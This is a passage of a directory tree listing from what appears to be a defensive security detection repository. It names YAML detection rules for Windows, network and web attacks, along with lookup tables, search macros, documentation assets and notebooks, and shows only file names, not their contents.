│ ├── windows_remote_services_allow_remote_assistance.yml
│ ├── windows_remote_services_rdp_enable.yml
│ ├── windows_renamed_powershell_execution.yml
│ ├── windows_replication_through_removable_media.yml
│ ├── windows_root_domain_linked_policies_discovery.yml
│ ├── windows_rundll32_apply_user_settings_changes.yml
│ ├── windows_rundll32_webdav_request.yml
│ ├── windows_rundll32_webdav_with_network_connection.yml
│ ├── windows_runmru_command_execution.yml
│ ├── windows_scheduled_task_created_via_xml.yml
│ ├── windows_scheduled_task_dll_module_loaded.yml
│ ├── windows_scheduled_task_service_spawned_shell.yml
│ ├── windows_scheduled_task_with_highest_privileges.yml
│ ├── windows_scheduled_task_with_suspicious_command.yml
│ ├── windows_scheduled_task_with_suspicious_name.yml
│ ├── windows_scheduled_tasks_for_compmgmtlauncher_or_eventvwr.yml
│ ├── windows_schtasks_create_run_as_system.yml
│ ├── windows_scmanager_security_descriptor_tampering_via_sc_exe.yml
│ ├── windows_screen_capture_in_temp_folder.yml
│ ├── windows_screen_capture_via_powershell.yml
│ ├── windows_security_account_manager_stopped.yml
│ ├── windows_security_and_backup_services_stop.yml
│ ├── windows_security_support_provider_reg_query.yml
│ ├── windows_sensitive_group_discovery_with_net.yml
│ ├── windows_sensitive_registry_hive_dump_via_commandline.yml
│ ├── windows_server_software_component_gacutil_install_to_gac.yml
│ ├── windows_service_create_kernel_mode_driver.yml
│ ├── windows_service_create_remcomsvc.yml
│ ├── windows_service_create_sliverc2.yml
│ ├── windows_service_create_with_tscon.yml
│ ├── windows_service_created_with_suspicious_service_name.yml
│ ├── windows_service_created_with_suspicious_service_path.yml
│ ├── windows_service_creation_on_remote_endpoint.yml
│ ├── windows_service_creation_using_registry_entry.yml
│ ├── windows_service_deletion_in_registry.yml
│ ├── windows_service_execution_remcom.yml
│ ├── windows_service_initiation_on_remote_endpoint.yml
│ ├── windows_service_stop_attempt.yml
│ ├── windows_service_stop_by_deletion.yml
│ ├── windows_service_stop_win_updates.yml
│ ├── windows_set_account_password_policy_to_unlimited_via_net.yml
│ ├── windows_shell_process_from_crushftp.yml
│ ├── windows_sip_provider_inventory.yml
│ ├── windows_sip_winverifytrust_failed_trust_validation.yml
│ ├── windows_snake_malware_file_modification_crmlog.yml
│ ├── windows_snake_malware_kernel_driver_comadmin.yml
│ ├── windows_snake_malware_registry_modification_wav_openwithprogids.yml
│ ├── windows_snake_malware_service_create.yml
│ ├── windows_snappybee_create_test_registry.yml
│ ├── windows_soaphound_binary_execution.yml
│ ├── windows_spearphishing_attachment_onenote_spawn_mshta.yml
│ ├── windows_special_privileged_logon_on_multiple_hosts.yml
│ ├── windows_sql_server_configuration_option_hunt.yml
│ ├── windows_sql_server_critical_procedures_enabled.yml
│ ├── windows_sql_server_extended_procedure_dll_loading_hunt.yml
│ ├── windows_sql_server_startup_procedure.yml
│ ├── windows_sql_server_xp_cmdshell_config_change.yml
│ ├── windows_sql_spawning_certutil.yml
│ ├── windows_sqlcmd_execution.yml
│ ├── windows_sqlservr_spawning_shell.yml
│ ├── windows_sqlwriter_sqldumper_dll_sideload.yml
│ ├── windows_ssh_proxy_command.yml
│ ├── windows_steal_authentication_certificates___esc1_abuse.yml
│ ├── windows_steal_authentication_certificates___esc1_authentication.yml
│ ├── windows_steal_authentication_certificates_certificate_issued.yml
│ ├── windows_steal_authentication_certificates_certificate_request.yml
│ ├── windows_steal_authentication_certificates_certutil_backup.yml
│ ├── windows_steal_authentication_certificates_cryptoapi.yml
│ ├── windows_steal_authentication_certificates_cs_backup.yml
│ ├── windows_steal_authentication_certificates_export_certificate.yml
│ ├── windows_steal_authentication_certificates_export_pfxcertificate.yml
│ ├── windows_steal_or_forge_kerberos_tickets_klist.yml
│ ├── windows_subinacl_execution.yml
│ ├── windows_suspect_process_with_authentication_traffic.yml
│ ├── windows_suspicious_child_process_spawned_from_webserver.yml
│ ├── windows_suspicious_driver_loaded_path.yml
│ ├── windows_suspicious_process_file_path.yml
│ ├── windows_svchost_exe_parent_process_anomaly.yml
│ ├── windows_system_binary_proxy_execution_compiled_html_file_decompile.yml
│ ├── windows_system_discovery_using_ldap_nslookup.yml
│ ├── windows_system_discovery_using_qwinsta.yml
│ ├── windows_system_file_on_disk.yml
│ ├── windows_system_logoff_commandline.yml
│ ├── windows_system_network_config_discovery_display_dns.yml
│ ├── windows_system_network_connections_discovery_netsh.yml
│ ├── windows_system_reboot_commandline.yml
│ ├── windows_system_remote_discovery_with_query.yml
│ ├── windows_system_script_proxy_execution_syncappvpublishingserver.yml
│ ├── windows_system_shutdown_commandline.yml
│ ├── windows_system_time_discovery_w32tm_delay.yml
│ ├── windows_system_user_discovery_via_quser.yml
│ ├── windows_system_user_privilege_discovery.yml
│ ├── windows_terminating_lsass_process.yml
│ ├── windows_time_based_evasion.yml
│ ├── windows_time_based_evasion_via_choice_exec.yml
│ ├── windows_uac_bypass_suspicious_child_process.yml
│ ├── windows_uac_bypass_suspicious_escalation_behavior.yml
│ ├── windows_unsecured_outlook_credentials_access_in_registry.yml
│ ├── windows_unsigned_dll_side_loading.yml
│ ├── windows_unsigned_dll_side_loading_in_same_process_path.yml
│ ├── windows_unsigned_ms_dll_side_loading.yml
│ ├── windows_unusual_count_of_disabled_users_failed_auth_using_kerberos.yml
│ ├── windows_unusual_count_of_invalid_users_fail_to_auth_using_kerberos.yml
│ ├── windows_unusual_count_of_invalid_users_failed_to_auth_using_ntlm.yml
│ ├── windows_unusual_count_of_users_fail_to_auth_wth_explicitcredentials.yml
│ ├── windows_unusual_count_of_users_failed_to_auth_using_kerberos.yml
│ ├── windows_unusual_count_of_users_failed_to_authenticate_from_process.yml
│ ├── windows_unusual_count_of_users_failed_to_authenticate_using_ntlm.yml
│ ├── windows_unusual_count_of_users_remotely_failed_to_auth_from_host.yml
│ ├── windows_unusual_ntlm_authentication_destinations_by_source.yml
│ ├── windows_unusual_ntlm_authentication_destinations_by_user.yml
│ ├── windows_unusual_ntlm_authentication_users_by_destination.yml
│ ├── windows_unusual_ntlm_authentication_users_by_source.yml
│ ├── windows_unusual_syswow64_process_run_system32_executable.yml
│ ├── windows_usbstor_registry_key_modification.yml
│ ├── windows_user_deletion_via_net.yml
│ ├── windows_user_disabled_via_net.yml
│ ├── windows_user_discovery_via_net.yml
│ ├── windows_user_execution_malicious_url_shortcut_file.yml
│ ├── windows_vulnerable_3cx_software.yml
│ ├── windows_vulnerable_driver_installed.yml
│ ├── windows_vulnerable_driver_loaded.yml
│ ├── windows_windbg_spawning_autoit3.yml
│ ├── windows_winlogon_with_public_network_connection.yml
│ ├── windows_wmi_impersonate_token.yml
│ ├── windows_wmi_process_and_service_list.yml
│ ├── windows_wmi_process_call_create.yml
│ ├── windows_wmic_shadowcopy_delete.yml
│ ├── windows_wpdbusenum_registry_key_modification.yml
│ ├── winevent_scheduled_task_created_to_spawn_shell.yml
│ ├── winevent_scheduled_task_created_within_public_path.yml
│ ├── winevent_windows_task_scheduler_event_action_started.yml
│ ├── winhlp32_spawning_a_process.yml
│ ├── winrar_spawning_shell_application.yml
│ ├── winrm_spawning_a_process.yml
│ ├── wmi_permanent_event_subscription.yml
│ ├── wmi_permanent_event_subscription___sysmon.yml
│ ├── wmi_recon_running_process_or_services.yml
│ ├── wmi_temporary_event_subscription.yml
│ ├── wmic_group_discovery.yml
│ ├── wmic_noninteractive_app_uninstallation.yml
│ ├── wmic_xsl_execution_via_url.yml
│ ├── wmiprsve_lolbas_execution_process_spawn.yml
│ ├── wscript_or_cscript_suspicious_child_process.yml
│ ├── wsmprovhost_lolbas_execution_process_spawn.yml
│ ├── wsreset_uac_bypass.yml
│ ├── xmrig_driver_loaded.yml
│ └── xsl_script_execution_with_wmic.yml
├── network
│ ├── 3cx_supply_chain_attack_network_indicators.yml
│ ├── cisco_secure_firewall___binary_file_type_download.yml
│ ├── cisco_secure_firewall___bits_network_activity.yml
│ ├── cisco_secure_firewall___blacklisted_ssl_certificate_fingerprint.yml
│ ├── cisco_secure_firewall___blocked_connection.yml
│ ├── cisco_secure_firewall___communication_over_suspicious_ports.yml
│ ├── cisco_secure_firewall___connection_to_file_sharing_domain.yml
│ ├── cisco_secure_firewall___file_download_over_uncommon_port.yml
│ ├── cisco_secure_firewall___high_eve_threat_confidence.yml
│ ├── cisco_secure_firewall___high_priority_intrusion_classification.yml
│ ├── cisco_secure_firewall___high_volume_of_intrusion_events_per_host.yml
│ ├── cisco_secure_firewall___intrusion_events_by_threat_activity.yml
│ ├── cisco_secure_firewall___lumma_stealer_activity.yml
│ ├── cisco_secure_firewall___lumma_stealer_download_attempt.yml
│ ├── cisco_secure_firewall___lumma_stealer_outbound_connection_attempt.yml
│ ├── cisco_secure_firewall___malware_file_downloaded.yml
│ ├── cisco_secure_firewall___possibly_compromised_host.yml
│ ├── cisco_secure_firewall___potential_data_exfiltration.yml
│ ├── cisco_secure_firewall___rare_snort_rule_triggered.yml
│ ├── cisco_secure_firewall___remote_access_software_usage_traffic.yml
│ ├── cisco_secure_firewall___repeated_blocked_connections.yml
│ ├── cisco_secure_firewall___repeated_malware_downloads.yml
│ ├── cisco_secure_firewall___snort_rule_triggered_across_multiple_hosts.yml
│ ├── cisco_secure_firewall___veeam_cve_2023_27532_exploitation_activity.yml
│ ├── cisco_secure_firewall___wget_or_curl_download.yml
│ ├── detect_arp_poisoning.yml
│ ├── detect_dga_domains_using_pretrained_model_in_dsdl.yml
│ ├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml
│ ├── detect_dns_query_to_decommissioned_s3_bucket.yml
│ ├── detect_hosts_connecting_to_dynamic_domain_providers.yml
│ ├── detect_ipv6_network_infrastructure_threats.yml
│ ├── detect_large_icmp_traffic.yml
│ ├── detect_outbound_ldap_traffic.yml
│ ├── detect_outbound_smb_traffic.yml
│ ├── detect_port_security_violation.yml
│ ├── detect_remote_access_software_usage_dns.yml
│ ├── detect_remote_access_software_usage_traffic.yml
│ ├── detect_rogue_dhcp_server.yml
│ ├── detect_snicat_sni_exfiltration.yml
│ ├── detect_software_download_to_network_device.yml
│ ├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml
│ ├── detect_traffic_mirroring.yml
│ ├── detect_unauthorized_assets_by_mac_address.yml
│ ├── detect_windows_dns_sigred_via_splunk_stream.yml
│ ├── detect_windows_dns_sigred_via_zeek.yml
│ ├── detect_zerologon_via_zeek.yml
│ ├── dns_query_length_outliers___mltk.yml
│ ├── dns_query_length_with_high_standard_deviation.yml
│ ├── excessive_dns_failures.yml
│ ├── f5_big_ip_icontrol_rest_vulnerability_cve_2022_1388.yml
│ ├── hosts_receiving_high_volume_of_network_traffic_from_email_server.yml
│ ├── internal_horizontal_port_scan.yml
│ ├── internal_horizontal_port_scan_nmap_top_20.yml
│ ├── internal_vertical_port_scan.yml
│ ├── internal_vulnerability_scan.yml
│ ├── large_volume_of_dns_any_queries.yml
│ ├── ngrok_reverse_proxy_on_network.yml
│ ├── prohibited_network_traffic_allowed.yml
│ ├── protocol_or_port_mismatch.yml
│ ├── protocols_passing_authentication_in_cleartext.yml
│ ├── remote_desktop_network_traffic.yml
│ ├── rundll32_dnsquery.yml
│ ├── smb_traffic_spike.yml
│ ├── smb_traffic_spike___mltk.yml
│ ├── ssl_certificates_with_punycode.yml
│ ├── suspicious_process_dns_query_known_abuse_web_services.yml
│ ├── suspicious_process_with_discord_dns_query.yml
│ ├── tor_traffic.yml
│ ├── wermgr_process_connecting_to_ip_check_web_services.yml
│ ├── windows_abused_web_services.yml
│ ├── windows_ad_replication_service_traffic.yml
│ ├── windows_ad_rogue_domain_controller_network_activity.yml
│ ├── windows_dns_query_request_by_telegram_bot_api.yml
│ ├── windows_gather_victim_network_info_through_ip_check_web_services.yml
│ ├── windows_multi_hop_proxy_tor_website_query.yml
│ ├── windows_remote_desktop_network_bruteforce_attempt.yml
│ ├── windows_spearphishing_attachment_connect_to_none_ms_office_domain.yml
│ └── zeek_x509_certificate_with_punycode.yml
└── web
│ ├── access_to_vulnerable_ivanti_connect_secure_bookmark_endpoint.yml
│ ├── adobe_coldfusion_access_control_bypass.yml
│ ├── adobe_coldfusion_unauthenticated_arbitrary_file_read.yml
│ ├── cisco_ios_xe_implant_access.yml
│ ├── citrix_adc_and_gateway_unauthorized_data_disclosure.yml
│ ├── citrix_adc_exploitation_cve_2023_3519.yml
│ ├── citrix_sharefile_exploitation_cve_2023_24489.yml
│ ├── confluence_cve_2023_22515_trigger_vulnerability.yml
│ ├── confluence_data_center_and_server_privilege_escalation.yml
│ ├── confluence_pre_auth_rce_via_ognl_injection_cve_2023_22527.yml
│ ├── confluence_unauthenticated_remote_code_execution_cve_2022_26134.yml
│ ├── connectwise_screenconnect_authentication_bypass.yml
│ ├── crushftp_authentication_bypass_exploitation.yml
│ ├── crushftp_max_simultaneous_users_from_ip.yml
│ ├── detect_attackers_scanning_for_vulnerable_jboss_servers.yml
│ ├── detect_f5_tmui_rce_cve_2020_5902.yml
│ ├── detect_malicious_requests_to_exploit_jboss_servers.yml
│ ├── detect_remote_access_software_usage_url.yml
│ ├── detect_web_access_to_decommissioned_s3_bucket.yml
│ ├── exploit_public_facing_application_via_apache_commons_text.yml
│ ├── exploit_public_facing_fortinet_fortinac_cve_2022_39952.yml
│ ├── f5_tmui_authentication_bypass.yml
│ ├── fortinet_appliance_auth_bypass.yml
│ ├── high_volume_of_bytes_out_to_url.yml
│ ├── hunting_for_log4shell.yml
│ ├── ivanti_connect_secure_command_injection_attempts.yml
│ ├── ivanti_connect_secure_ssrf_in_saml_component.yml
│ ├── ivanti_connect_secure_system_information_access_via_auth_bypass.yml
│ ├── ivanti_epm_sql_injection_remote_code_execution.yml
│ ├── ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35078.yml
│ ├── ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35082.yml
│ ├── ivanti_sentry_authentication_bypass.yml
│ ├── java_class_file_download_by_java_user_agent.yml
│ ├── jenkins_arbitrary_file_read_cve_2024_23897.yml
│ ├── jetbrains_teamcity_authentication_bypass_cve_2024_27198.yml
│ ├── jetbrains_teamcity_authentication_bypass_suricata_cve_2024_27198.yml
│ ├── jetbrains_teamcity_limited_auth_bypass_suricata_cve_2024_27199.yml
│ ├── jetbrains_teamcity_rce_attempt.yml
│ ├── juniper_networks_remote_code_execution_exploit_detection.yml
│ ├── log4shell_jndi_payload_injection_attempt.yml
│ ├── log4shell_jndi_payload_injection_with_outbound_connection.yml
│ ├── microsoft_sharepoint_server_elevation_of_privilege.yml
│ ├── monitor_web_traffic_for_brand_abuse.yml
│ ├── multiple_archive_files_http_post_traffic.yml
│ ├── nginx_connectwise_screenconnect_authentication_bypass.yml
│ ├── papercut_ng_remote_web_access_attempt.yml
│ ├── plain_http_post_exfiltrated_data.yml
│ ├── proxyshell_proxynotshell_behavior_detected.yml
│ ├── sap_netweaver_visual_composer_exploitation_attempt.yml
│ ├── spring4shell_payload_url_request.yml
│ ├── sql_injection_with_long_urls.yml
│ ├── supernova_webshell.yml
│ ├── tomcat_session_deserialization_attempt.yml
│ ├── tomcat_session_file_upload_attempt.yml
│ ├── unusually_long_content_type_length.yml
│ ├── vmware_aria_operations_exploit_attempt.yml
│ ├── vmware_server_side_template_injection_hunt.yml
│ ├── vmware_workspace_one_freemarker_server_side_template_injection.yml
│ ├── web_jsp_request_via_url.yml
│ ├── web_remote_shellservlet_access.yml
│ ├── web_spring4shell_http_request_class_module.yml
│ ├── web_spring_cloud_function_functionrouter.yml
│ ├── windows_exchange_autodiscover_ssrf_abuse.yml
│ ├── windows_iis_server_pswa_console_access.yml
│ ├── wordpress_bricks_builder_plugin_rce.yml
│ ├── ws_ftp_remote_code_execution.yml
│ ├── zscaler_adware_activities_threat_blocked.yml
│ ├── zscaler_behavior_analysis_threat_blocked.yml
│ ├── zscaler_cryptominer_downloaded_threat_blocked.yml
│ ├── zscaler_employment_search_web_activity.yml
│ ├── zscaler_exploit_threat_blocked.yml
│ ├── zscaler_legal_liability_threat_blocked.yml
│ ├── zscaler_malware_activity_threat_blocked.yml
│ ├── zscaler_phishing_activity_threat_blocked.yml
│ ├── zscaler_potentially_abused_file_download.yml
│ ├── zscaler_privacy_risk_destinations_threat_blocked.yml
│ ├── zscaler_scam_destinations_threat_blocked.yml
│ └── zscaler_virus_download_threat_blocked.yml
├── dist
└── .gitkeep
├── docs
├── .gitignore
├── mitre-map
│ ├── cisa-2021-top-malware-coverage
│ │ ├── AgentTesla_sec_content_mitre_coverage.json
│ │ ├── Azorult_sec_content_mitre_coverage.json
│ │ ├── Qakbot_sec_content_mitre_coverage.json
│ │ ├── Remcos_sec_content_mitre_coverage.json
│ │ └── Trickbot_sec_content_mitre_coverage.json
│ ├── coverage.png
│ └── rats-stealer-detection-coverage
│ │ ├── Amadey_sec_content_mitre_coverage.json
│ │ ├── AsyncRAT_sec_content_mitre_coverage.json
│ │ ├── DarkCrystal RAT_sec_content_mitre_coverage.json
│ │ ├── DarkGate Malware_sec_content_mitre_coverage.json
│ │ ├── NjRAT_sec_content_mitre_coverage.json
│ │ ├── PlugX_sec_content_mitre_coverage.json
│ │ ├── Warzone_RAT_sec_content_mitre_coverage.json
│ │ └── mitre_tid_tactic_technique.json
├── static
│ ├── attack_range.png
│ ├── escu_app_logo.png
│ ├── escu_sb.png
│ ├── feature_detection.png
│ ├── feature_playbooks.png
│ ├── feature_stories.png
│ ├── logo.png
│ ├── splunk_banner.png
│ ├── structure.png
│ └── team_photo.png
└── yaml-spec
│ ├── detection_spec.yml
│ ├── lookups_spec.yml
│ ├── macros_spec.yml
│ └── stories_spec.yml
├── lookups
├── 3cx_ioc_domains.csv
├── 3cx_ioc_domains.yml
├── __mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.mlmodel
├── __mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml
├── __mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.mlmodel
├── __mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml
├── __mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl.mlmodel
├── __mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
├── __mlspl_pretrained_dga_model_dsdl.mlmodel
├── __mlspl_pretrained_dga_model_dsdl.yml
├── __mlspl_unusual_commandline_detection.mlmodel
├── __mlspl_unusual_commandline_detection.yml
├── ace_access_rights_lookup.csv
├── ace_access_rights_lookup.yml
├── ace_flag_lookup.csv
├── ace_flag_lookup.yml
├── ace_type_lookup.csv
├── ace_type_lookup.yml
├── advanced_audit_policy_guids.csv
├── advanced_audit_policy_guids.yml
├── api_call_by_user_baseline.yml
├── applockereventcodes.csv
├── applockereventcodes.yml
├── asr_rules.csv
├── asr_rules.yml
├── attacker_tools.csv
├── attacker_tools.yml
├── aws_service_accounts.csv
├── aws_service_accounts.yml
├── baseline_blocked_outbound_connections.csv
├── baseline_blocked_outbound_connections.yml
├── brandmonitoring_lookup.csv
├── brandmonitoring_lookup.yml
├── browser_app_list.csv
├── browser_app_list.yml
├── builtin_groups_lookup.csv
├── builtin_groups_lookup.yml
├── char_conversion_matrix.csv
├── char_conversion_matrix.yml
├── cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.csv
├── cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.yml
├── cisco_secure_firewall_filetype_lookup.csv
├── cisco_secure_firewall_filetype_lookup.yml
├── cisco_snort_ids_to_threat_mapping.csv
├── cisco_snort_ids_to_threat_mapping.yml
├── cloud_instances_enough_data.yml
├── decommissioned_buckets.yml
├── discovered_dns_records.csv
├── discovered_dns_records.yml
├── domain_admins.csv
├── domain_admins.yml
├── domains.csv
├── domains.yml
├── dynamic_dns_providers_default.csv
├── dynamic_dns_providers_default.yml
├── dynamic_dns_providers_local.csv
├── dynamic_dns_providers_local.yml
├── hijacklibs.csv
├── hijacklibs.yml
├── hijacklibs_loaded.csv
├── hijacklibs_loaded.yml
├── images_to_repository.csv
├── images_to_repository.yml
├── is_net_windows_file.csv
├── is_net_windows_file.yml
├── is_nirsoft_software.csv
├── is_nirsoft_software.yml
├── is_suspicious_file_extension_lookup.csv
├── is_suspicious_file_extension_lookup.yml
├── is_windows_system_file.csv
├── is_windows_system_file.yml
├── k8s_container_network_io_baseline.yml
├── k8s_container_network_io_ratio_baseline.yml
├── k8s_process_resource_baseline.yml
├── k8s_process_resource_ratio_baseline.yml
├── legit_domains.csv
├── legit_domains.yml
├── linux_tool_discovery_process.csv
├── linux_tool_discovery_process.yml
├── local_file_inclusion_paths.csv
├── local_file_inclusion_paths.yml
├── lolbas_file_path.csv
├── lolbas_file_path.yml
├── loldrivers.csv
├── loldrivers.yml
├── lookup_rare_process_allow_list_default.csv
├── lookup_rare_process_allow_list_default.yml
├── lookup_rare_process_allow_list_local.csv
├── lookup_rare_process_allow_list_local.yml
├── lookup_uncommon_processes_default.csv
├── lookup_uncommon_processes_default.yml
├── lookup_uncommon_processes_local.csv
├── lookup_uncommon_processes_local.yml
├── malicious_powershell_strings.csv
├── malicious_powershell_strings.yml
├── mandatory_job_for_workflow.csv
├── mandatory_job_for_workflow.yml
├── mandatory_step_for_job.csv
├── mandatory_step_for_job.yml
├── msad_guid_lookup.csv
├── msad_guid_lookup.yml
├── network_acl_activity_baseline.csv
├── network_acl_activity_baseline.yml
├── previously_seen_api_calls_from_user_roles.yml
├── previously_seen_aws_cross_account_activity.yml
├── previously_seen_aws_regions.yml
├── previously_seen_cloud_api_calls_per_user_role.yml
├── previously_seen_cloud_compute_creations_by_user.yml
├── previously_seen_cloud_compute_images.yml
├── previously_seen_cloud_compute_instance_types.yml
├── previously_seen_cloud_instance_modifications_by_user.yml
├── previously_seen_cloud_provisioning_activity_sources.yml
├── previously_seen_cloud_regions.yml
├── previously_seen_cmd_line_arguments.csv
├── previously_seen_cmd_line_arguments.yml
├── previously_seen_ec2_amis_lookup.yml
├── previously_seen_ec2_instance_types_lookup.yml
├── previously_seen_ec2_launches_by_user_lookup.yml
├── previously_seen_ec2_modifications_by_user.csv
├── previously_seen_ec2_modifications_by_user.yml
├── previously_seen_gcp_storage_access_from_remote_ip.yml
├── previously_seen_provisioning_activity_src.yml
├── previously_seen_running_windows_services.yml
├── previously_seen_s3_access_from_remote_ip.yml
├── previously_seen_users_console_logins.yml
├── privileged_azure_ad_roles.csv
├── privileged_azure_ad_roles.yml
├── prohibited_apps_launching_cmd.csv
├── prohibited_apps_launching_cmd.yml
├── prohibited_processes.csv
├── prohibited_processes.yml
├── ransomware_extensions_lookup.csv
├── ransomware_extensions_lookup.yml
├── ransomware_notes_lookup.csv
├── ransomware_notes_lookup.yml
├── remote_access_software.csv
├── remote_access_software.yml
├── remote_access_software_exceptions.yml
├── s3_deletion_baseline.yml
├── security_group_activity_baseline.yml
├── security_services_lookup.csv
├── security_services_lookup.yml
├── sslbl_ssl_certificate_blacklist.csv
├── sslbl_ssl_certificate_blacklist.yml
├── suspicious_writes_lookup.csv
├── suspicious_writes_lookup.yml
├── threat_snort_count.csv
├── threat_snort_count.yml
├── windows_protocol_handlers.csv
├── windows_protocol_handlers.yml
├── windows_suspicious_services.csv
├── windows_suspicious_services.yml
├── windows_suspicious_tasks.csv
├── windows_suspicious_tasks.yml
└── zoom_first_time_child_process.yml
├── macros
├── admon.yml
├── amazon_security_lake.yml
├── appdynamics_security.yml
├── applocker.yml
├── aws_cloudwatchlogs_eks.yml
├── aws_config.yml
├── aws_description.yml
├── aws_ecr_users.yml
├── aws_ecr_users_asl.yml
├── aws_s3_accesslogs.yml
├── aws_securityhub_finding.yml
├── aws_securityhub_firehose.yml
├── azure_audit.yml
├── azure_monitor_aad.yml
├── azure_monitor_activity.yml
├── azuread.yml
├── base64decode.yml
├── bootloader_inventory.yml
├── brand_abuse_dns.yml
├── brand_abuse_email.yml
├── brand_abuse_web.yml
├── capi2_operational.yml
├── certificateservices_lifecycle.yml
├── circleci.yml
├── cisco_ai_defense.yml
├── cisco_networks.yml
├── cisco_secure_firewall.yml
├── cisco_secure_firewall_inside_to_outside.yml
├── cloud_api_calls_from_previously_unseen_user_roles_activity_window.yml
├── cloudtrail.yml
├── cloudwatch_eks.yml
├── cloudwatch_vpc.yml
├── cloudwatchlogs_vpcflow.yml
├── crowdstrike_identities.yml
├── crowdstrike_stream.yml
├── crushftp.yml
├── driverinventory.yml
├── dynamic_dns_providers.yml
├── dynamic_dns_web_traffic.yml
├── ec2_modification_api_calls.yml
├── evilginx_phishlets_0365.yml
├── evilginx_phishlets_amazon.yml
├── evilginx_phishlets_aws.yml
├── evilginx_phishlets_facebook.yml
├── evilginx_phishlets_github.yml
├── evilginx_phishlets_google.yml
├── evilginx_phishlets_outlook.yml
├── f5_bigip_rogue.yml
├── fillnull_config.yml
├── filter_rare_process_allow_list.yml
├── github.yml
├── github_enterprise.yml
├── github_known_users.yml
├── github_organizations.yml
├── google_gcp_pubnet_message.yml
├── google_gcp_pubsub_message.yml
├── gsuite_calendar.yml
├── gsuite_drive.yml
├── gsuite_gmail.yml
├── gws_login_mfa_methods.yml
├── gws_reports_admin.yml
├── gws_reports_login.yml
├── iis_get_webglobalmodule.yml
├── iis_operational_logs.yml
├── important_audit_policy_subcategory_guids.yml
├── is_net_windows_file_macro.yml
├── is_nirsoft_software_macro.yml
├── is_windows_system_file_macro.yml
├── ivanti_vtm_audit.yml
├── kube_allowed_images.yml
├── kube_allowed_locations.yml
├── kube_allowed_user_agents.yml
├── kube_allowed_user_groups.yml
├── kube_allowed_user_names.yml
├── kube_audit.yml
├── kube_container_falco.yml
├── kube_objects_events.yml
├── kubernetes_azure.yml
├── kubernetes_container_controller.yml
├── kubernetes_metrics.yml
├── linux_auditd.yml
├── linux_auditd_normalized_execve_process.yml
├── linux_auditd_normalized_proctitle_process.yml
├── linux_hosts.yml
├── linux_shells.yml
├── moveit_sftp_logs.yml
├── ms365_defender_incident_alerts.yml
├── ms_defender.yml
├── ms_defender_atp_alerts.yml
├── msexchange_management.yml
├── netbackup.yml
├── network_acl_events.yml
├── nginx_access_logs.yml
├── normalized_service_binary_field.yml
├── ntlm_audit.yml
├── o365_graph.yml
├── o365_management_activity.yml
├── o365_messagetrace.yml
├── o365_suspect_search_terms_regex.yml
├── okta.yml
├── oldsummaries_config.yml
├── osquery_macro.yml
├── osquery_process.yml
├── papercutng.yml
├── pingid.yml
├── potential_password_in_username_false_positive_reduction.yml
├── potentially_malicious_code_on_cmdline_tokenize_score.yml
├── powershell.yml
├── previously_seen_cloud_api_calls_per_user_role_forget_window.yml
├── previously_seen_cloud_compute_creations_by_user_search_window_begin_offset.yml
├── previously_seen_cloud_compute_image_search_window_begin_offset.yml
├── previously_seen_cloud_compute_images_forget_window.yml
├── previously_seen_cloud_compute_instance_type_forget_window.yml
├── previously_seen_cloud_compute_instance_types_search_window_begin_offset.yml
├── previously_seen_cloud_instance_modifications_by_user_search_window_begin_offset.yml
├── previously_seen_cloud_provisioning_activity_forget_window.yml
├── previously_seen_cloud_region_forget_window.yml
├── previously_seen_cloud_regions_search_window_begin_offset.yml
├── previously_seen_windows_services_forget_window.yml
├── previously_seen_windows_services_window.yml
├── previously_seen_zoom_child_processes_forget_window.yml
├── previously_seen_zoom_child_processes_window.yml
├── previously_unseen_cloud_provisioning_activity_window.yml
├── printservice.yml
├── process_auditpol.yml
├── process_bitsadmin.yml
├── process_certutil.yml
├── process_cmd.yml
├── process_copy.yml
├── process_csc.yml
├── process_cscript.yml
├── process_curl.yml
├── process_diskshadow.yml
├── process_dllhost.yml
├── process_dsquery.yml
├── process_dxdiag.yml
├── process_esentutl.yml
├── process_fodhelper.yml
├── process_gpupdate.yml
├── process_hh.yml
├── process_installutil.yml
├── process_microsoftworkflowcompiler.yml
├── process_msbuild.yml
├── process_mshta.yml
├── process_msiexec.yml
├── process_net.yml
├── process_netsh.yml
├── process_nltest.yml
├── process_ntdsutil.yml
├── process_office_products.yml
├── process_office_products_parent.yml
├── process_ping.yml
├── process_powershell.yml
├── process_procdump.yml
├── process_psexec.yml
├── process_rclone.yml
├── process_reg.yml
├── process_regasm.yml
├── process_regedit.yml
├── process_regsvcs.yml
├── process_regsvr32.yml
├── process_route.yml
├── process_runas.yml
├── process_rundll32.yml
├── process_sc.yml
├── process_schtasks.yml
├── process_sdelete.yml
├── process_setspn.yml
├── process_sqlcmd.yml
├── process_verclsid.yml
├── process_vssadmin.yml
├── process_wbadmin.yml
├── process_wermgr.yml
├── process_wmic.yml
├── process_wscript.yml
├── prohibited_apps_launching_cmd_macro.yml
├── prohibited_softwares.yml
├── ransomware_extensions.yml
├── ransomware_notes.yml
├── remote_access_software_usage_exceptions.yml
├── remoteconnectionmanager.yml
├── remove_valid_domains.yml
├── risk_index.yml
├── s3_accesslogs.yml
├── security_content_ctime.yml
├── security_content_summariesonly.yml
├── security_group_api_calls.yml
├── stream_dns.yml
├── stream_http.yml
├── stream_tcp.yml
├── subjectinterfacepackage.yml
├── summariesonly_config.yml
├── suricata.yml
├── suspicious_email_attachments.yml
├── suspicious_writes.yml
├── sysmon.yml
├── system_network_configuration_discovery_tools.yml
├── uacbypass_process_name.yml
├── uncommon_processes.yml
├── windows_exchange_iis.yml
├── windows_shells.yml
├── wineventlog_application.yml
├── wineventlog_rdp.yml
├── wineventlog_security.yml
├── wineventlog_system.yml
├── wineventlog_task_scheduler.yml
├── wmi.yml
├── zeek_rpc.yml
├── zeek_ssl.yml
├── zeek_x509.yml
└── zscaler_proxy.yml
├── notebooks
├── cisa_commonalities_notebook.ipynb
├── cisa_commonalities_notebook.yml
├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.ipynb
